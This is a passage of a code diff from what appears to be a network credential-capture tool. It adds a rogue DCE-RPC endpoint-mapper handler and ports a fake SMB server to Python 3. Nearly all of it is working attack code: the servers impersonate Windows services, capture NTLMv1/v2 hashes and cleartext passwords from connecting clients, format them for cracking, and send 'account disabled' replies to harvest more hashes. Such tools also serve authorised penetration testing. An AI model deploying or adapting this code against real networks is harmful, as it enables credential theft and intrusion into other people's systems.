+					x = RPCMapBindMapperAns(Tower1UID=WKSSVC, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WKSSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == WINSPOOL:
+					x = RPCMapBindMapperAns(Tower1UID=WINSPOOL, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WINSPOOL auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == WINREG:
+					x = RPCMapBindMapperAns(Tower1UID=WINREG, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WINREG auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == SVCCTL:
+					x = RPCMapBindMapperAns(Tower1UID=SVCCTL, Tower1Version="\x02\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SVCCTL auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == ATSVC:
+					x = RPCMapBindMapperAns(Tower1UID=ATSVC, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to ATSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == DNSSERVER:
+					x = RPCMapBindMapperAns(Tower1UID=DNSSERVER, Tower1Version="\x05\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to DNSSERVER auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == NETLOGON:
+					# Don't redirect NETLOGON for now - we want NTLM not SecureChannel
+					self.request.close()
+					return
+				
+				# Try to receive more data
+				try:
+					data = self.request.recv(2048)
+					if data and FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (name or "unknown interface", self.client_address[0].replace("::ffff:", "")), 3, 1))
+				except:
+					pass
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DCE-RPC] Exception in RPCMap: %s' % str(e)))
+			pass
+		finally:
+			try:
+				self.request.close()
+			except:
+				pass
+
+
+class RPCMapper(BaseRequestHandler):
+	"""RPCMapper handler - Handles actual RPC service connections"""
+	
+	def handle(self):
+		try:
+			data = self.request.recv(2048)
+			if not data:
+				return
+			
+			self.request.settimeout(3)
+			Challenge = RandomChallenge()
+			
+			# Look for NTLMSSP NEGOTIATE
+			if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+				n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+				n.calculate()
+				RPC = RPCNTLMNego(Data=n)
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				
+				# Wait for NTLMSSP AUTH
+				data = self.request.recv(2048)
+			
+			# Look for NTLMSSP AUTH
+			if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+				ParseRPCHash(data, self.client_address[0], Challenge)
+				print(color("[*] [DCE-RPC Mapper] NTLM authentication from %s" % self.client_address[0].replace("::ffff:", ""), 3, 1))
+			
+			# Check if this is a BIND with auth
+			elif data[0:3] == b"\x05\x00\x0b":
+				uuid, name = FindInterfaceUUID(data)
+				if name and settings.Config.Verbose:
+					print(text('[DCE-RPC Mapper] Connection for %s from %s' % (name, self.client_address[0].replace("::ffff:", ""))))
+				
+				# Check for NTLMSSP in BIND
+				if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+					n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					n.calculate()
+					RPC = RPCNTLMNego(Data=n)
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					
+					data = self.request.recv(2048)
+					if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						print(color("[*] [DCE-RPC Mapper] NTLM authentication on %s from %s" % (name or "unknown interface", self.client_address[0].replace("::ffff:", "")), 3, 1))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DCE-RPC Mapper] Exception: %s' % str(e)))
+			pass
+		finally:
+			try:
+				self.request.close()
+			except:
+				pass

servers/SMB.py

@@ -14,12 +14,15 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct, re
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from random import randrange
 from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
-from SocketServer import BaseRequestHandler
-from utils import *
-import struct
-import re
 
 
 def Is_Anonymous(data):  # Detect if SMB auth was Anonymous
@@ -43,30 +46,25 @@ def Parse_Nego_Dialect(data):
 		if Dialect[i] == 'NT LM 0.12':
 			return chr(i) + '\x00'
 
-
 def midcalc(data):  #Set MID SMB Header field.
     return data[34:36]
 
-
-
 def uidcalc(data):  #Set UID SMB Header field.
     return data[32:34]
 
-
 def pidcalc(data):  #Set PID SMB Header field.
     pack=data[30:32]
     return pack
 
-
 def tidcalc(data):  #Set TID SMB Header field.
     pack=data[28:30]
     return pack
 
 def ParseShare(data):
 	packet = data[:]
-	a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
+	a = re.search(b'(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
 	if a:
-		print text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE'))
+		print(text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE')))
 
 def GrabMessageID(data):
     Messageid = data[28:36]
@@ -74,8 +72,8 @@ def GrabMessageID(data):
 
 def GrabCreditRequested(data):
     CreditsRequested = data[18:20]
-    if CreditsRequested == "\x00\x00":
-       CreditsRequested =  "\x01\x00"
+    if CreditsRequested == b'\x00\x00':
+       CreditsRequested =  b'\x01\x00'
     else:
        CreditsRequested = data[18:20]
     return CreditsRequested
@@ -88,34 +86,26 @@ def GrabSessionID(data):
     SessionID = data[44:52]
     return SessionID
 
-def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
-	SecBlobLen = struct.unpack('<H',data[51:53])[0]
-	BccLen     = struct.unpack('<H',data[61:63])[0]
-
-	if SecBlobLen < 260:
-		SSPIStart    = data[75:]
-		LMhashLen    = struct.unpack('<H',data[89:91])[0]
-		LMhashOffset = struct.unpack('<H',data[91:93])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[97:99])[0]
-		NthashOffset = struct.unpack('<H',data[99:101])[0]
-	else:
-		SSPIStart    = data[79:]
-		LMhashLen    = struct.unpack('<H',data[93:95])[0]
-		LMhashOffset = struct.unpack('<H',data[95:97])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[101:103])[0]
-		NthashOffset = struct.unpack('<H',data[103:105])[0]
+def ParseSMBHash(data,client, Challenge):  #Parse SMB NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
 
 	if NthashLen == 24:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[105:107])[0]
-		DomainOffset = struct.unpack('<H',data[107:109])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-		UserLen      = struct.unpack('<H',data[113:115])[0]
-		UserOffset   = struct.unpack('<H',data[115:117])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
 
 		SaveToDb({
 			'module': 'SMB', 
@@ -127,14 +117,15 @@ def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
 		})
 
 	if NthashLen > 60:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[109:111])[0]
-		DomainOffset = struct.unpack('<H',data[111:113])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-		UserLen      = struct.unpack('<H',data[117:119])[0]
-		UserOffset   = struct.unpack('<H',data[119:121])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
 
 		SaveToDb({
 			'module': 'SMB', 
@@ -145,43 +136,17 @@ def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
 			'fullhash': WriteHash,
 		})
 
-
-def ParseSMB2NTLMv2Hash(data,client):  #Parse SMB NTLMv2
-    SSPIStart = data[113:]
-    data = data[113:]
-    LMhashLen = struct.unpack('<H',data[12:14])[0]
-    LMhashOffset = struct.unpack('<H',data[16:18])[0]
-    LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-    NthashLen = struct.unpack('<H',data[22:24])[0]
-    NthashOffset = struct.unpack('<H',data[24:26])[0]
-    SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-    DomainLen = struct.unpack('<H',data[30:32])[0]
-    DomainOffset = struct.unpack('<H',data[32:34])[0]
-    Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-    UserLen      = struct.unpack('<H',data[38:40])[0]
-    UserOffset   = struct.unpack('<H',data[40:42])[0]
-    Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-    WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
-    SaveToDb({
-                'module': 'SMBv2', 
-		'type': 'NTLMv2-SSP', 
-		'client': client, 
-		'user': Domain+'\\'+Username, 
-		'hash': SMBHash, 
-		'fullhash': WriteHash,
-             })
-
-def ParseLMNTHash(data, client):  # Parse SMB NTLMv1/v2
+def ParseLMNTHash(data, client, Challenge):  # Parse SMB NTLMv1/v2
 	LMhashLen = struct.unpack('<H',data[51:53])[0]
 	NthashLen = struct.unpack('<H',data[53:55])[0]
 	Bcc = struct.unpack('<H',data[63:65])[0]
-	Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
+	Username, Domain = tuple([e.decode('latin-1') for e in data[89+NthashLen:Bcc+60].split(b'\x00\x00\x00')[:2]])
 
 	if NthashLen > 25:
-		FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
+		FullHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex')
 		LmHash = FullHash[:32].upper()
 		NtHash = FullHash[32:].upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), LmHash.decode('latin-1'), NtHash.decode('latin-1'))
 	
 		SaveToDb({
 			'module': 'SMB', 
@@ -193,10 +158,9 @@ def ParseLMNTHash(data, client):  # Parse SMB NTLMv1/v2
 		})
 
 	if NthashLen == 24:
-		NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
-		LmHash = data[65:65+LMhashLen].encode('hex').upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
-
+		NtHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex').upper()
+		LmHash = codecs.encode(data[65:65+LMhashLen],'hex').upper()
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash.decode('latin-1'), NtHash.decode('latin-1'), codecs.encode(Challenge,'hex').decode('latin-1'))
 		SaveToDb({
 			'module': 'SMB', 
 			'type': 'NTLMv1', 
@@ -214,13 +178,13 @@ def IsNT4ClearTxt(data, client):
 		WordCount = data[HeadLen]
 		ChainedCmdOffset = data[HeadLen+1]
 
-		if ChainedCmdOffset == "\x75":
+		if ChainedCmdOffset == "\x75" or ChainedCmdOffset == 117:
 			PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
 
 			if PassLen > 2:
 				Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
 				User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
-				print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
+				print(text("[SMB] Clear Text Credentials: %s:%s" % (User,Password)))
 				WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
 
 
@@ -231,213 +195,180 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 			while True:
 				data = self.request.recv(1024)
 				self.request.settimeout(1)
+				Challenge = RandomChallenge()
 
 				if not data:
 					break
 
-				if data[0] == "\x81":  #session request 139
-					Buffer = "\x82\x00\x00\x00"
+				if data[0:1] == b"\x81":  #session request 139
+					Buffer = b"\x82\x00\x00\x00"
 					try:
 						self.request.send(Buffer)
 						data = self.request.recv(1024)
 					except:
 						pass
 
-
                                 ##Negotiate proto answer SMBv2.
-				if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
-              				head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
-            				t = SMB2NegoAns()
-         				t.calculate()
-        				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-      				        self.request.send(buffer1)
-      				        data = self.request.recv(1024)
-                                ## Session Setup 1 answer SMBv2.
-				if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
-              				t = SMB2NegoAns(Dialect="\x10\x02")
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 2 answer SMBv2.
-				if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
-              				t = SMB2Session1Data()
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 3 answer SMBv2.
-				if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
-              				ParseSMB2NTLMv2Hash(data, self.client_address[0])
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
-              				t = SMB2Session2Data()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-
-                                # Negotiate Protocol Response smbv1
-				if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None:
-				        Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
-					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
-					Body.calculate()
-		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
+				if data[8:10] == b"\x72\x00" and re.search(rb"SMB 2.\?\?\?", data):
+					head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
+					t = SMB2NegoAns()
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
 					data = self.request.recv(1024)
 
-				if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # Session Setup AndX Request smbv1
+                                ## Nego answer SMBv2.
+				if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'))
+					t = SMB2NegoAns(Dialect="\x10\x02")
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 2 answer SMBv2.
+				if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), SessionID=GrabSessionID(data).decode('latin-1'),NTStatus="\x16\x00\x00\xc0")
+					t = SMB2Session1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 3 answer SMBv2.
+				if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
+					ParseSMBHash(data, self.client_address[0], Challenge)
+					if settings.Config.ErrorCode:
+						ntstatus="\x6d\x00\x00\xc0"
+					else:
+						ntstatus="\x22\x00\x00\xc0"
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus=ntstatus, SessionID=GrabSessionID(data).decode('latin-1'))
+					t = SMB2Session2Data()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+
+                                # Negotiate Protocol Response smbv1
+				if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(rb'SMB 2.\?\?\?', data) == None:
+					Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+					Body.calculate()
+		
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+					data = self.request.recv(1024)
+
+				if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # Session Setup AndX Request smbv1
 					IsNT4ClearTxt(data, self.client_address[0])
 					
 					# STATUS_MORE_PROCESSING_REQUIRED
-					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
+					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					else:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					Body.calculate()
 		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 
 
-					if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # STATUS_SUCCESS
+					if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # STATUS_SUCCESS
 						if Is_Anonymous(data):
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 							Body = SMBSessEmpty()
 
-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))
 
 						else:
 							# Parse NTLMSSP_AUTH packet
-							ParseSMBHash(data,self.client_address[0])
+							ParseSMBHash(data,self.client_address[0], Challenge)
 
 							if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
 								# Send ACCOUNT_DISABLED to get multiple hashes if there are any
-								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 								Body = SMBSessEmpty()
 
-								Packet = str(Header)+str(Body)
-								Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+								packet1 = str(Header)+str(Body)
+								Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-								self.request.send(Buffer)
+								self.request.send(NetworkSendBufferPython2or3(Buffer))
 								self.ntry += 1
 								continue
 
 							# Send STATUS_SUCCESS
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 							Body = SMBSession2Accept()
 							Body.calculate()
 
-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))
 							data = self.request.recv(1024)
 				
 
-				if data[8:10] == "\x75\x00" and data[4:5] == "\xff":  # Tree Connect AndX Request
+				if data[8:10] == b"\x75\x00" and data[4:5] == b"\xff":  # Tree Connect AndX Request
 					ParseShare(data)
-					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
+					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(NetworkRecvBufferPython2or3(data)), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Body = SMBTreeData()
 					Body.calculate()
 
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
-
-				if data[8:10] == "\x71\x00" and data[4:5] == "\xff":  #Tree Disconnect
-					Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					
-					self.request.send(Buffer)
